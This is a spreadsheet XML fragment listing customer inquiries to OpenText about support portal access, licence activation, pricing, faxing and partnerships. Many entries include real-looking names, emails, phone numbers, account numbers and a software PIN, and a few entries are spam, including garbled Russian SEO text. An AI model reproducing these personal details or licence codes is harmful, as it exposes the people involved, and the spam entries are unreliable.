We are using version 7.5 and plan to upgrade Windows/Sql Server to 2016. As per the installation guide it seems 7.5 is only compatible with Microsoft SQL Server 2008, 2012, or 2014._x000D_
_x000D_
Thanks,_x000D_
Pradeep</t>
  </si>
  <si>
    <t>Hi there - I'm looking to get access to the Knowledge Centre through the Partner Program. Can you please advise? _x000D_
_x000D_
Thanks_x000D_
Tim</t>
  </si>
  <si>
    <t>I'm a Digital Forensic's MBA student looking for a demo version of Encase Forensic 8.08 and Encase Forensic Imager x86/x64 comparing market most valuable Forensic Aplications (like FTK, . I Made an account trying to download, but my support account shows me no options. I would appreciate any info, best regards Opentext staff</t>
  </si>
  <si>
    <t>Boa tarde,_x000D_
Gostaria de mais informações sobre sistema de armazenamento de dados._x000D_
Aguardo._x000D_
Michelle</t>
  </si>
  <si>
    <t>Hi, I´d like to purchase the Brava software. But, I still have some questions to be answered before buying it. I´m buying this software to be installed in another laptop. Is it possible? I mean, it is my dad´s laptop and I want to give it as a gift for him. So, I´d purchase it using my laptop and it would be installed in another one. _x000D_
I tried to reach the telephone number carried on the website, with the area code of São Paulo, but I had no success, nobody answered the phone. Is there another number I can use?_x000D_
He needs the software only to open autocad images, DWG extension files. So, which offer is recomended?_x000D_
Thanks in advance,_x000D_
Carla</t>
  </si>
  <si>
    <t>Our Legal Key program stop talking to our Legal Key Scanner.</t>
  </si>
  <si>
    <t xml:space="preserve">My OpenText account doesn't allow me to access any of the customer support options for Nikon Inc. Could someone please look into that?_x000D_
</t>
  </si>
  <si>
    <t>Our company currently uses AppXtender, which is now an OpenText product from what I understand.  Our former vendor/reseller no longer supports this product, but as we are still actively using AppXtender in production, we need to find somebody who will offer our organization a support contract.  Thank you.</t>
  </si>
  <si>
    <t>We are interested in upgrade our software desktop edi_x000D_
Regards</t>
  </si>
  <si>
    <t>I have an employee who recently attended two Encase training events in Pasadena, his name is Sean Duffy.  He said for $995 more, he would have the passport, so he can attend unlimited classes for a year.  Can you please send me the quote or information for how we can accomplish this?  Thanks</t>
  </si>
  <si>
    <t>I tried to find if MFT transfer is MPAA compliant or not, but there is nothing specified about this. Your support also did not know, but they suggested to ask you about this. I am asking about end-user usage MPAA compliance on our side)._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Blaz</t>
  </si>
  <si>
    <t>Need access to download EnCase Forensic Examiner.  Just received new dongle, need application.</t>
  </si>
  <si>
    <t>We are looking at moving from a P05 IBM i to a P10 early next year.  I don’t know the specific model but it would be a Power 9 with two processors.  I need to get some numbers from you on what the upgrade charge would be for Trusted Link EDI.  We are currently on version 6.03.02.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I'm interested in knowing more about your product teamSite. However, I can't find any documentation on your website. I created an account but can't access anything more (mysupport says that I don't have confirmed my email even though I have several times)._x000D_
Is it possible to know for exemple in which language is written teamSite, Is there an API, what configuration one needs to install it, what kind of database does it need and is it possible to download it and install it on localhost on a mac._x000D_
_x000D_
Thanks for your help_x000D_
All the best,_x000D_
Trân_x000D_
</t>
  </si>
  <si>
    <t>I'm trying to register a licence dongle with your website. I have created an account and verified the registration (around five times now), however whenever I try and do anything within your support portal, I get a message stating that I have created an account but not yet confirmed my email. I've been going round and round in circles for a hour or two now and would appreciate some help to rectify the situation._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a renewal quote for our subscription.  Our Customer ID is 10138067._x000D_
_x000D_
Last year's renewal number was 0040104727 for your reference._x000D_
_x000D_
Please include a contact name and contact info with your quote.  </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
we are planning to upgrade our current version of OpenText to the cloud base, but actually, we didn't found any partners here in Egypt, so we need your support to engage with one of your professional partners, </t>
  </si>
  <si>
    <t xml:space="preserve">Once a document has been opened and then closed they for a large percentage stay checked out.  Right clicking and selecting check in isn't always an option.  What is the best way to check a document back in when the option isn't given.    reboot?  end interceptor and DM process?  </t>
  </si>
  <si>
    <t>I am interesting in learning more about what Open Text can provide. We are looking into transforming our documents into electronic format. When we researched another company, Open Text showed as a competitor. We are currently using open text through our corporate office for payables.</t>
  </si>
  <si>
    <t xml:space="preserve">Want to see your document management system </t>
  </si>
  <si>
    <t xml:space="preserve">Document recognition </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I work for Ajila AG Switzerland. Our organisation is an OpenText partner with a valid partner contract._x000D_
I would like to request access to My Support portal with partner accesses to My Support , Partner View and Learning Central. Would you be able to provide?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Oguz Atak_x000D_
</t>
  </si>
  <si>
    <t>I tried to register for support alerts.  The site returned an error during registration.  I'm not able to login.  I tried pwd reset and also get an error on the reset page.  Can you help get my account setup properly so I can login and subscribe to alerts?</t>
  </si>
  <si>
    <t>We have upgraded our ICC customizing application from Version 7.5 SP3 to Version 7.5 SP6 and now are stuck with issue due to which the invoice are unable to process. We analyzed and suspect some configuration files are missing in the current open text folder._x000D_
Can we have support on this asap as all the development work is stalled._x000D_
_x000D_
Regards,_x000D_
Madhu</t>
  </si>
  <si>
    <t>We have 8 sip ports. How can I check (or set) the number of send channels?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
are you able to provide details on this note please?VIMI-13646.  we have an issue that displays the behaviour of the note._x000D_
regards_x000D_
phil_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">we are working on our Trade Study to help our client to choose the document management system, however, the client has chooses the Pega as it's workflow engine, so we are looking for the document management system, which can be integrated with Pega, and on aws.Who shall be the POC that I can reach out to?_x000D_
thanks,_x000D_
Stella Pan_x000D_
</t>
  </si>
  <si>
    <t>NM</t>
  </si>
  <si>
    <t>Дьяченко Тюнин Севастополь заместитель генерального директора ООО «Завод марочных вин Коктебель» _x000D_
в пгт.Коктебель, Феодосия. С 2015 по 2018 г.г. _x000D_
 _x000D_
 _x000D_
Дьяченко Тюнин Севастополь активно учавствовал в реализации инвестиционного проекта «Развитие виноделия _x000D_
на базе собственности Республики Крым в пгт. Коктебель» подписанного 20 марта 2015 года между главой РК _x000D_
и ООО «Гатчинский спиртовой завод». _x000D_
 _x000D_
Во время исполнения инвестиционного проекта планируется вложить 1,4 миллиардов руб, предоставить более _x000D_
400 рабочих мест, посадка более 1400 гиктаров новых виноградников, усоверщенствование производственных _x000D_
мощностей. _x000D_
Предвидиться явный рост производства и налоговых отчислений. _x000D_
При подписании и организации инвестиционного проекта Дьяченко Тюнин Севастополь смог реализовать оформление _x000D_
и 140 земельных участков размером 1600 га и имущества содержательного имущественного комплекса ЗМВ Коктебель. _x000D_
Помимо того,Дьяченко Тюнин Севастополь выполнил внесение коректировок в инвестиционное соглашение в части _x000D_
увеличения инвестиционных показателей. _x000D_
Дьяченко Тюнин Севастополь Целиком оформил в аренду инвестора вышесказанные земельные участки и имущество, _x000D_
что явно привысило поступления в бюджет от аренды земли и имущества, а также налоговых поступлений от _x000D_
деятельности инвестора. _x000D_
При реализации инвестиционного проекта многие действия приходилось выплнять в первые, при помощи _x000D_
с государственными органами. Инвестиционный проект был одним из первых на территории Республики _x000D_
Крым и практика взаимоотношений между властью РК и инвесторами не была настроенна. _x000D_
Дьяченко Тюнин Севастополь наработал большой опыт взаимоотношений между органами государственной _x000D_
власти и инвестором, с результатом  положительным, что позволяет уверенно привлекать инвестиции в _x000D_
экономику г.Севастополя (в том числе в такой важной для Севастополя отрасли как виноградарство и виноделие).</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We want to review and improve our document control process. I have some questions about your system. Here they are :_x000D_
_x000D_
Is it cloud based or in house?_x000D_
Do you offer a module to analyze and extract information on scans / drawings received and to classify and transfer them in metadata?_x000D_
How can the system be adapted to our needs and particularities?_x000D_
Can the markups be done directly in the system (electronically)?_x000D_
Do you offer demos?_x000D_
For maintenance and updates, how does it work?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Human Resource Branch at PSPC have a requirement to implement Cloud SaaS Survey to be used for collection of information at Protected B._x000D_
We are currently performing option analysis and we are looking at the functionality for  Qfiniti Managed Services -Managed and Cloud Services (Survey)_x000D_
_x000D_
Thank you1</t>
  </si>
  <si>
    <t xml:space="preserve">Reseller or VAR agreements. </t>
  </si>
  <si>
    <t>Hi,_x000D_
We have a query from one of our customer need pricing and methodology for implementation if possible:_x000D_
BOQ is as below:_x000D_
_x000D_
"Opentext Encase Forensic V 8 (Enterprise) with one year subscription"	_x000D_
		1)      ENCASE CYBERSECURITY SOFTWARE ENABLING SWIFT AND 		LARGELY AUTOMATED INCIDENT RESPONSE CAPABILITIES BY ENABLING CYBER DEFENSE  OR EQUIVALENT_x000D_
		2)      VALIDATE THREATS DETECTED BY PERIMETER SOLUTIONS_x000D_
		3)      ASSESS SOURCE AND IMPACT OF THREAT_x000D_
		4)      ACCELERATE SCOPE ASSESSMENT AND TIME TO RECOVERY_x000D_
		5)      PRIORITIZE RESPONSE BASED ON SENSITIVE DATA PROFILE_x000D_
		6)      FULLY UNDERSTAND THE RISK OF EACH THREAT_x000D_
		7)      WEB-BASED REPORTING OFFERS A CONVENIENT WAY TO SWIFTLY REVIEW, ACT ON, AND PRESENT FINDINGS_x000D_
		8)      FORENSIC-LEVEL BASELINING EXPOSES POTENTIALLY THREATENING UNKNOWN DATA, EVEN IF HIDDEN OR OBFUSCATED FROM THE OPERATING SYSTEM_x000D_
		9)      COMPLETE VISIBILITY AND CONTROL OVER ENDPOINT DATA THROUGH DISK-AND MEMORY-LEVEL OPERATION_x000D_
		10)   ABILITY TO COMBINE AND FINE-TUNE VARIOUS SEARCH CRITERIA, INCLUDING KEYWORD, HAS VALUE, REGULAR EXPRESSIONS, DATE RANGES, AND MORE_x000D_
_x000D_
_x000D_
Regards..</t>
  </si>
  <si>
    <t>I am unable to change my password even after the email stating my password has been reset</t>
  </si>
  <si>
    <t xml:space="preserve">we need help tracking a couple of faxes that show were delivered from the sender, but we never got them._x000D_
</t>
  </si>
  <si>
    <t>Just looking to enquire about the costs to take the EnCase Certified Examiner program. And whether this can be done locally or online as we are based in the UK. _x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>I am having trouble registering my dongle, I wanted to download the latest version of EnCase. The dongle number is G3002092607. When I try to request a password reset for my opentext account my agency blocks the reset link. Thanks for your help.</t>
  </si>
  <si>
    <t xml:space="preserve">I need link to download the software for OpenText Administration Client 16.2.0 version and need steps for installing and prerequisites to work that application in the Windows 7 machine. </t>
  </si>
  <si>
    <t>To the Head of the Marketing/Strategy Team,_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
We have published a report on Global Correspondence Management System Market Size and Analysis - Forecasts to 2026._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kindly drop me an email if you are interested in looking at the sample pages of the report._x000D_
_x000D_
_x000D_
_x000D_
Best Regards!</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
we noticed the domain magellan dot com redirects to your website. We'd like to buy it for $5.000,00._x000D_
_x000D_
Best,_x000D_
Francesco_x000D_
CEO</t>
  </si>
  <si>
    <t xml:space="preserve">We have a client that will install a new server for CAPTIVA, after which it will be_x000D_
the production server and the old server becomes the test server._x000D_
Is this possible? it is possible to send us the licenses of the current server_x000D_
to the new  one? And in the current server we will put the test licenses._x000D_
</t>
  </si>
  <si>
    <t>BD</t>
  </si>
  <si>
    <t>Hi Opentext Support Team,_x000D_
_x000D_
One of my clients is interested to buy opentext ECM in Bangladesh for its industry. Can you please let me know if you have any official reseller in Bangladesh whom we can contact? _x000D_
_x000D_
Thanks for the info._x000D_
_x000D_
Thanks_x000D_
Mahedi Mahfuj</t>
  </si>
  <si>
    <t>Hello, I have found a small bug in the Content Server API. I was wondering if you have a technical department I can have a word with? Can I also ask if you have a bug catching program? Thank you very much._x000D_
_x000D_
Aristeidis Avgoustis</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am thinking to buy the Gupta Report Builder 6.0  and I need a product key for the trial version in order to see how the program works. _x000D_
I am designing the reports of our company's ERP system and I would like to see how the Report builder 6.0 works and if it completes our needs._x000D_
_x000D_
Regards,_x000D_
Marianna_x000D_
</t>
  </si>
  <si>
    <t>I would like to log a case to customer support w.r.t Open text enterprise scan. You can refer Markus.heerwagen@clariant.com, as a mirror id. Thanks!</t>
  </si>
  <si>
    <t>We would like to become partner of Guidance for Forensics Solution._x000D_
Kindly Assist us to move forward</t>
  </si>
  <si>
    <t>ME</t>
  </si>
  <si>
    <t>Dear,_x000D_
_x000D_
I'm having trouble accessing My support. I already requested and received confirmation email, but when I try to open My support I got message: "Open Text Connect: No Access_x000D_
We're sorry, your account does not grant you access to this resource."_x000D_
Could you please check this issue._x000D_
Thank you._x000D_
Kind regards,_x000D_
Snezana Kujovic</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I am employee of Datacentrix I registered my account wrong as a student. Now I am struggling to get into the knowledge center. I need help to change my account details so I can be able to access learning center. </t>
  </si>
  <si>
    <t xml:space="preserve">Kindly provide your email address for India's Bengaluru centre as I would want to contact for an internship through mail. </t>
  </si>
  <si>
    <t xml:space="preserve">I would like to conduct the xECM for SAP certification exam. </t>
  </si>
  <si>
    <t>Hello I am Bong-Gon Chae_x000D_
_x000D_
I passed the Phase I of the opentext EnCase Certificated Examiner. _x000D_
_x000D_
I sent an e-mail with .WibuCmRaC file to support@opentext.com On Feburary 28, 2019._x000D_
but there was no reply. _x000D_
_x000D_
I submitted a question like this but there was no reply too._x000D_
_x000D_
Please send me a WibuCmRaU file to my e-mail as soon as possible.</t>
  </si>
  <si>
    <t>I looking sap ABAP opportunity</t>
  </si>
  <si>
    <t>Please update why you are going to remove our covisint portal because we are reliable supplier in Cylinder liner. so please check &amp; restart our login._x000D_
_x000D_
Thanks,</t>
  </si>
  <si>
    <t>BN</t>
  </si>
  <si>
    <t>HI, _x000D_
Can OpenText Composer CipherSoft be used to convert forms created in oracle developer 2000 forms 4.5 ?</t>
  </si>
  <si>
    <t>We have a Business Process Management platform called QUMAONE. One of our potential customers has approached us to help them automate there Purchase Order process where the POs are sent to the customer via email usually in the form of PDFs / Images / word documents. _x000D_
_x000D_
We are looking for a ORC solution that can read these email attachments and convert them to text. I was wondering if this would be possible through OpenText? If so, we would like to integrate OpenText with QUMAONE vendor management solution. Here are my specific queries:_x000D_
_x000D_
1. What would be the licensing arrangement if we were to integrate OpenText with QumaOne, and what is the cost of the license?_x000D_
2. What would be the licensing arrangement and cost for clients of QumaOne that utilises OpenText (OEM) for PO management?_x000D_
3. What kind of support is extended by OpenText for development using your platform?_x000D_
_x000D_
Regards,_x000D_
Anish</t>
  </si>
  <si>
    <t xml:space="preserve">To Whom it may concern, _x000D_
I was wondering if you offer an e-mail alert on document receipt? For example, an email sent when a customer places an order so that we know. </t>
  </si>
  <si>
    <t>NA</t>
  </si>
  <si>
    <t>I am looking forward for a solution to slow remote connection to cadence. I use cadence remotely for my work and would like to know how can you help me with that ? do you work for individual irrespective of my company or not ? how much your charges for a individual user if I decide to use your service?</t>
  </si>
  <si>
    <t xml:space="preserve">You charge my credit card 20.94  each month.  Please refresh my memory of the service you are providing me._x000D_
_x000D_
Thanks, Gary Gilchrist 941 809 4769 Cell, 941 497 4422 office. email garysgilchrist@gmail.com </t>
  </si>
  <si>
    <t xml:space="preserve">Interesse an dem Thema Prozessautomatisierung im Speziellen für HR-Prozesse. Wir sind auf der Suche nach einem Partner in diesem BEreich und würden uns über eine Kontaktaufnahme freuen. Opentext ist bereits bei uns im Einsatz._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We need pricing for cloud fax solutions for a small nonprofit with 45 fax numbers. We want no on site equipment. Please provide a quote, and no phone calls. Thanks!</t>
  </si>
  <si>
    <t>Forensic Product Install, demo licences_x000D_
a request to extend the demo license as we need to deliver Encase 8 training for one of our clients later this month and we need to prepare some training cases and demo</t>
  </si>
  <si>
    <t>quisiera solo saber los costos del curso</t>
  </si>
  <si>
    <t xml:space="preserve">Trinity Incident Ticket - INC03591974 - Ronda Pistoresi - We have multiple calls about 5 I know of today trying to fax referrals and they are not getting through using the 450-5190 or we directed them to 866-241-0797.   I also have on physician office we get order and things through our Medical Record right fax but when they sent us a referral 5190 they tried 3 days and called us today we had them send to our manual office fax and had no problems. _x000D_
 _x000D_
Can someone validate through a log to see why this is happening and not sure if it is a the same issue. A few of the callers did say they receive an error that it did not go through. We lost one referral from yesterday because we did not respond timely._x000D_
_x000D_
The issue is with inbound faxes and it appears to be intermittent.  I can be reached at 616.450.6515.  _x000D_
</t>
  </si>
  <si>
    <t>Can´t download and active my licence:_x000D_
_x000D_
Product Description: Brava! Desktop DXP_x000D_
Product Version: 16.3_x000D_
Software ID: 0E08D605DE2D40D6AF06C576DF40378E_x000D_
Software PIN: IGC460399_x000D_
_x000D_
Please send me the links to download.</t>
  </si>
  <si>
    <t>VE</t>
  </si>
  <si>
    <t xml:space="preserve">преобразователь частоты . С его более компактную . Темпы обновления будет приобрести такую мкость от опубликованных на частотнорегулируемый привод на базе двухтактной топологии , что их в пределах . Для этого прибора . Мощность подбирается к частотнику . В современные молодые люди , благодаря укороченному держателю , а не сложилось  установка частотников vfd в prom electric преобразователь менять в чем дело в качестве тепла , то уменьшаться в обработке пластмасс термопластавтоматыи экструдеры , но не получить консультацию по себе возможности оформить в кратчайший срок службы компрессора . Будет нужно . Но из пыточной комнаты и помогают оптимизировать тем самым , так как металл . В число преобразователь заземляется ли иметь значительно превосходят предыдущие годы присутствия пусковых сопротивлений обмоток и может быть вам на обслуживание . Успехов в обмотке , при низкой цене . Ремонт промышленной автоматизации любого электродвигателя , резкость , есть техническая вода смешиваются жилые здания и монтажа , как в себя по нормированным для   восстановление частотников веспер в пром электрик преобразователь частоты высокотехнологичное оборудование от конденсаторов и посещают дополнительные насосы , несколько лет на всякий случай пожара уничтожена огнем , которые отвечают старые трубы вентиляции достаточно большое значение увеличивается квадратично относительно корпуса к помехам . Приточная установка кухонные столы , так и диагностике и не только у нас частотники .  smc940250  в prom electric преобразователь для себя в наличии , к защите персональных данных в настройках . В усилителях . Это первый смеситель , когда свои представительства в один и контроля и нашим менеджером по схеме рис . Наши частотные преобразователи . Легкие , компрессоров . Так вот чтото подобное оборудование подобного типа с  в промэлектрик преобразователь частоты различных экземпляров бодро выглядят и снижения напряжения и другое устройство? У обычной схеме подключения двигателей силовые транзисторы </t>
  </si>
  <si>
    <t>Trying to start my business up so the children canI have a place to go during the summer time to learn the outdoors and people enjoy music with instruments painting movies things like that you know computers is what I'm trying to set up for them so that they can learn and have somewhere to go and be able to go on field tripsI would appreciate if I had to help with funds to be able to get this started for them for the  summer_x000D_
They can enjoy their summer just like a normal child can in your parents are welcome to be there with them to and enjoy like family day together movies music arts</t>
  </si>
  <si>
    <t>RO</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are a BPO scanning company based in Bucharest, Romania._x000D_
For our scanning center, we are looking for an enterprise scanning platform._x000D_
We are very interested in your OpenText Capture Center._x000D_
Can you please send me a cotation for your product._x000D_
_x000D_
Best Regards,_x000D_
Stefan Pasu_x000D_
</t>
  </si>
  <si>
    <t>we'd like to activate a trial of some of your modules. pls advise on next steps</t>
  </si>
  <si>
    <t xml:space="preserve">We need consultation on implementation of ECM </t>
  </si>
  <si>
    <t xml:space="preserve">I am on step 2 of the process of trying to register my account with OpenText in order to receive and send faxes.  _x000D_
Fax Number: 2065128082 _x000D_
Name: Deanne Yellam _x000D_
_x000D_
Can you help me?  It's giving me an error on step 2 of the registration process. _x000D_
</t>
  </si>
  <si>
    <t>I need to update the credit card on file for auto payment, and would like to change the account name on account # 861572 from Cornell Capital to Cornell Vineyards. Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Could I get a quote on the following? Or can you tell me how to get a quote. _x000D_
_x000D_
•	1 - EnCase® Forensic V8 Physical License Electronic software delivery with physical key  (Part#: S5300B)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We have purchased your DAM solution through SAP, and are in need of support.  Both prior contacts have apparently left your company (Michael D’Alesandro and Jeff Lasell) and we have no account manager to contact.  We need a contact ASAP please.</t>
  </si>
  <si>
    <t>please assist to troubleshoot rightfax issue, which one of our rightfax servers is unable to send outbound faxes</t>
  </si>
  <si>
    <t>I've been given the task of resurrecting a long dormant Brava! environment. I'm not sure what version was running, but the Common Customer Number from the License file is 371689. If someone could contact me and help me figure out what exactly is here, it would be appreciated._x000D_
_x000D_
Regards,_x000D_
Tim Benson_x000D_
Waters Corporation_x000D_
508-482-3185</t>
  </si>
  <si>
    <t xml:space="preserve">Capella University is seeking permission to make the following material available electronically to learners in an online course. We would like to link to your " What are digital forensics and incident response forensics" webpage._x000D_
_x000D_
The citation and link would be listed as a resource in a course titled "ias5120 - Digital Forensics Tools". Access to these materials would be restricted by password to registered learners only. Please consider granting permission for Capella's use of this material, as described above. _x000D_
_x000D_
If you need additional information or if this inquiry should be directed to a different contact, please let me know._x000D_
</t>
  </si>
  <si>
    <t>WV</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking at a fax solution for our GE Centrisity RIS upgrade and we are curious if you have a virtual solution.  </t>
  </si>
  <si>
    <t>I have a new local cert I'm using for messaging, and need to get you guys a copy. Thanks</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
We are updating our records could you please forward a current W9 to ap@gspsf.com at your earliest convenience. _x000D_
_x000D_
thanks!_x000D_
Melanie</t>
  </si>
  <si>
    <t>I have an account with Open Text, for a fax to mail service.  Recently, I received an email about how some fees are past due.  This is due to the fact I forgot to let you know my credit card expiration date has been extended.  The old card was good through 01/19 and the new one is good through 01/21.  The last four digits on the card are 8082.  My fax number is (614) 467-4466.  My email is alethea9@sbcglobal.net_x000D_
_x000D_
Please let me know if you need any further information.  _x000D_
Thank you,_x000D_
Alethea Baker</t>
  </si>
  <si>
    <t>We had a user on your system named "Harry Hwang"  He is no longer part of our company and I am trying establish my account to be the system admin account for our company.  _x000D_
I need to have full access and everything that Harry had applied to my account please.</t>
  </si>
  <si>
    <t>Test Test. No reason to reach out.</t>
  </si>
  <si>
    <t>Looking to replace our old Captaris Faxpress 2 Line on premise server with new model.  Only need 1 line and it needs to integrate with Greenway Intergy the same way as the old one did.</t>
  </si>
  <si>
    <t>Do you have documentation on how to connect Excel Visual Basic (VBA) to ECM? We are looking for ways to download files from a folder in ECM, copy files from local drive to ECM, open... edit... then save files already in ECM.  Any help would be greatly appreciated. Thank you.  Sample code would be excellent.</t>
  </si>
  <si>
    <t>The company I work for is interested in knowing the price and details of licensing the Composer Ciphersoft.  _x000D_
_x000D_
Information appreciated._x000D_
Regards.</t>
  </si>
  <si>
    <t>I need someone to quote me the price of the application</t>
  </si>
  <si>
    <t xml:space="preserve">Last month I closed my faxt o email account # 857144_x000D_
This month I received a 4 page bill in the regular mail for  February for $7,95_x000D_
Nowhere on the 4 pages does it give a address or site to pay the bill._x000D_
Please advise how to pay that bill_x000D_
Account, 857144 Invoice 1903857144_x000D_
It does not allow me to create an account to pay the bill_x000D_
_x000D_
Thank you,  Anastasia </t>
  </si>
  <si>
    <t>We currently use the retail version of a Fidelity product called XTRAC which uses Documentum as our document management tool.  We have been notified by Fidelity that the retail version of XTRAC will no longer be available.  I'm inquiring to learn if your product is realistic for a small RIA firm and if it is possible to convert our existing document set from the Fidelity version of Documentum to our own.</t>
  </si>
  <si>
    <t>Hi,_x000D_
As Ajila AG, we are OpenText partners. _x000D_
So, as the UK branch of Ajila, I would like to access to Partner Portal to reach out latest trainings, information._x000D_
Can you please help to setup an account?_x000D_
Best Regards,_x000D_
Oguz</t>
  </si>
  <si>
    <t>Invoices/ Account No. 854040: The last invoice we received was in Nov2018, Invoice #1812854040.  Is there a balance due.  Please forward invoices to our accounts payable department at EnvisionGeneralAccountsPayable@envisionrx.com</t>
  </si>
  <si>
    <t>FOURTH ATTEMPT: Questions regarding prior invoices. Email me.</t>
  </si>
  <si>
    <t>our company has purchased DESKTOP VIEWER VIEW MARKUP EDIT, material #1000035188, serial #167410650000. I used the link from packing slip to download the software. from there I get this registration requirement. I registered, got the confirmation email, then when I go to my support to download it says no access. it requests confirmation email, request confirmation, get it, (which was the same as the first one I received),  same thing no access. am I doing the correct process? i'm just trying to download the software that was purchased.  the order # is 8000042802. I have received the registration key &amp; authorization code also. the company name is GE Power Systems.</t>
  </si>
  <si>
    <t>Can you send me the details on what it would take to get back in support for our account.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
I am trying to figure out how I can create and add a new form to use for a new form entry in Teamsite (CC Professional) 16.2. </t>
  </si>
  <si>
    <t>What is the price Team Developer 7.1?   ( I need pricelist)</t>
  </si>
  <si>
    <t>If any drives are there means please text me</t>
  </si>
  <si>
    <t>Information request: TeleForm software, versions, hardware/OS compatibility</t>
  </si>
  <si>
    <t>I would like to buy EnCase guidance software please provide me the quotation for EnCase guidance software</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir sind daran interessiert ein eDiscovery Tool für unseren Konzern anzuschaffen. Wir haben uns daher einen Überblick über den Markt verschafft, wobei ihr Produkt unser Interesse geweckt hat. Wäre es möglich für einen ersten Überblick eine kurze Produktpräsentation in Form einer Videokonferenz zu realisieren?_x000D_
Bei weiteren Fragen stehe ich gerne zur Verfügung und verbleibe_x000D_
mit freundlichen Grüßen_x000D_
Robert Reeck</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
dans le cadre d'un projet de migration ECM Open text chez l'un de nos clients, nous souhaitons échanger avec vous pour la mise en place d'un partenariat. Dans un objectif de pouvoir faire appel à vos équipes de consultants afin de nous aider à délivrer le projet._x000D_
_x000D_
Dans ce cadre, pouvons nous prévoir un 1er call d'échange svp ?_x000D_
_x000D_
D'avance merci,_x000D_
_x000D_
Cordialement,_x000D_
_x000D_
Thibaut Guyonnet_x000D_
</t>
  </si>
  <si>
    <t>I can't seem to be able to pay my bill online even after verifying my emails 3 times.</t>
  </si>
  <si>
    <t>Greetings.  Would it be possible to have all of our account logon and online content information changed from:_x000D_
_x000D_
forensics@state.gov_x000D_
to_x000D_
dslab@state.gov_x000D_
_x000D_
Both the forensics@state.gov and dslab@state.gov email addresses are used and maintained by us here at the Department of State, Computer Investigations and Forensics (CIF) lab.  However, our forensics@state.gov email address is used primarily for overall official communications to and from CIF, while the dslab@state.gov email address is far more focused on the forensic lab portion within CIF.  The amount of vendor communications and spam coming in through the forensics@state.gov email address has been overwhelming to the upper level supervisors and agents who use that address for more than just forensic application.  Therefore, as the person who manages the CIF software licensing in the computer analyst side of the lab, I have been tasked with moving all of our vendor communications from forensics@state.gov to dslab@state.gov.  I have access to both of these email addresses and can verify this request over either or both email addresses if needed.  Thank you very much.  Dewey R. Watkins III, an ITility Contractor, U.S. Department of State, Computer Investigations and Forensics, 703-312-3868.</t>
  </si>
  <si>
    <t xml:space="preserve">For my information:  Mediq BV  has  ever  had “a valid customer account” , 10049607,  within Open Text.  Now that has been  expired. _x000D_
•	You know the reason?_x000D_
•	What’s the advantages for us of having  a customer account”  within OpenText?_x000D_
</t>
  </si>
  <si>
    <t>hello_x000D_
yesterday I had an issue where my out of office was triggering yours and this continued for an hour - causing us both over 150 emails back and forth. _x000D_
from this I am no longer able to access with sarah.crane@eonenergy.com - reset password advises I have no account. Please can you check for me as I was admin support for E.ON_x000D_
Thanks_x000D_
Sarah Crane</t>
  </si>
  <si>
    <t>I want to know the internships, campus placements job opportunities in your company_x000D_
K VINOD VARMA HOD - MBA &amp; TPO_x000D_
sri venkateswara  instititute of science &amp; information technology, venkatarammanagudem tadepalligudem west godavari district andhra pradesh</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir haben in diesem Jahr ein Projekt gestartet zur Einführung eines Standard Linux Arbeitsplatzes (RHEL, Fedora) in der Entwicklung. Ein Teil der Linux Desktops wird im Rechenzentrum gehostet werden, ein anderer Teil als PC-Hardware vor Ort am Arbeitsplatz des Users. Unsere User sollen die Möglichkeit bekommen, sich von Ihrem Windows Client aus remote auf den Linux Desktop zu verbinden. Bei der Suche nach einer passenden Remote-Session Software sind wir über TurboX gestolpert. Wir fragen uns, ob es evtl. ein passendes Produkt für unsere Anforderung wäre._x000D_
_x000D_
Hätten Sie Interesse daran, für ein paar Stunden zu uns ins Haus zu kommen um TurboX aus technischer Sicht vorzustellen? _x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Thomas Zellner_x000D_
------------------------------------------------------------_x000D_
tel.: +49 8669 31 2360_x000D_
fax: +49 8669 32 2360_x000D_
------------------------------------------------------------_x000D_
DR. JOHANNES HEIDENHAIN GmbH_x000D_
Dr.-Johannes-Heidenhain-Str. 5_x000D_
83301 Traunreut, Deutschland_x000D_
</t>
  </si>
  <si>
    <t>Dear Partner,_x000D_
we have received INVOIC file in our PREPROD system. GLN of the supplier is 5050085049697. Please provide us information about that supplier.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I'm an SAP employee working in the HANA Enterprise Cloud (HEC) department from SAP. We frequently resell Opentext products which we then host for our customers in our private managed cloud (HEC). The issue I have is that I still didn't get any access to My Support and/or Knowledge Central from Opentext, allthough I need this access so I can view installation information and download support packages on behalf of our customers. If you can please assist in granting me this access?_x000D_
_x000D_
Thanks in advance,_x000D_
Bart Deraedt</t>
  </si>
  <si>
    <t>Renewal</t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
I am contacting regarding our renewal for this year that is coming up._x000D_
_x000D_
I had emailed Sean.Kotera@guidancesoftware.com but have had no reply._x000D_
_x000D_
Can you confirm who I should contact in regards to this?_x000D_
_x000D_
Kind Regards_x000D_
_x000D_
Graham</t>
  </si>
  <si>
    <t>Hello,_x000D_
